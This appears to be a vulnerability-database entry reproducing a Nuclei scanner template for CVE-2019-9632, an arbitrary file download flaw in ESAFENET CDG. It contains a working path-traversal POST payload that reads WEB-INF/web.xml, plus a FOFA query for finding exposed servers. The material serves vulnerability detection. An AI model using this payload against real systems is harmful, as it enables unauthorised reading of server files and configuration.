Lucene search
ProjectDiscoveryNUCLEI:CVE-2019-9632HistoryMar 23, 2024 - 10:22 a.m.
ESAFENET CDG - Arbitrary File Download
2024-03-2310:22:28
ProjectDiscovery
github.com
5
esafenet
electronic
document
security
management
vulnerability
filename
download
jsp
arbitrary
file
cvss
web
post
application
matchers
status
servlet
name
ESAFENET CDG V3 and V5 has an arbitrary file download vulnerability via the fileName parameter in download.jsp because the InstallationPack parameter is mishandled in a /CDGServer3/ClientAjax request.
id: CVE-2019-9632
info:
name: ESAFENET CDG - Arbitrary File Download
author: pdteam
severity: high
description: |
ESAFENET CDG V3 and V5 has an arbitrary file download vulnerability via the fileName parameter in download.jsp because the InstallationPack parameter is mishandled in a /CDGServer3/ClientAjax request.
reference:
- https://github.com/HimmelAward/Goby_POC
- https://github.com/Z0fhack/Goby_POC
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-9632
cpe: cpe:2.3:a:esafenet:electronic_document_security_management_system:v3:*:*:*:*:*:*:*
epss-score: 0.00183
epss-percentile: 0.54622
metadata:
product: electronic_document_security_management_system
vendor: esafenet
fofa-query: title="电子文档安全管理系统"
tags: cve,cve2019,esafenet,lfi
http:
- method: POST
path:
- "{{BaseURL}}/CDGServer3/ClientAjax"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<servlet-name>CDGPermissions</servlet-name>"
# digest: 4a0a00473045022100d8f52efc0132d9da0548edb08cd00e082b89df73730965c6be260eac77067f7602206acdc95cdd0603d42b209c3d751933b859ac36aa5f5c2d4491f4d6ae0da93f82:922c64590222798bb761d5b6d8e72950Related
cvelist
cvelist
CVE-2019-9632
2022-10-03 16:19:39
prion
prion
Design/Logic Flaw
2019-03-08 07:29:00
cve
cve
CVE-2019-9632
2019-03-08 07:29:00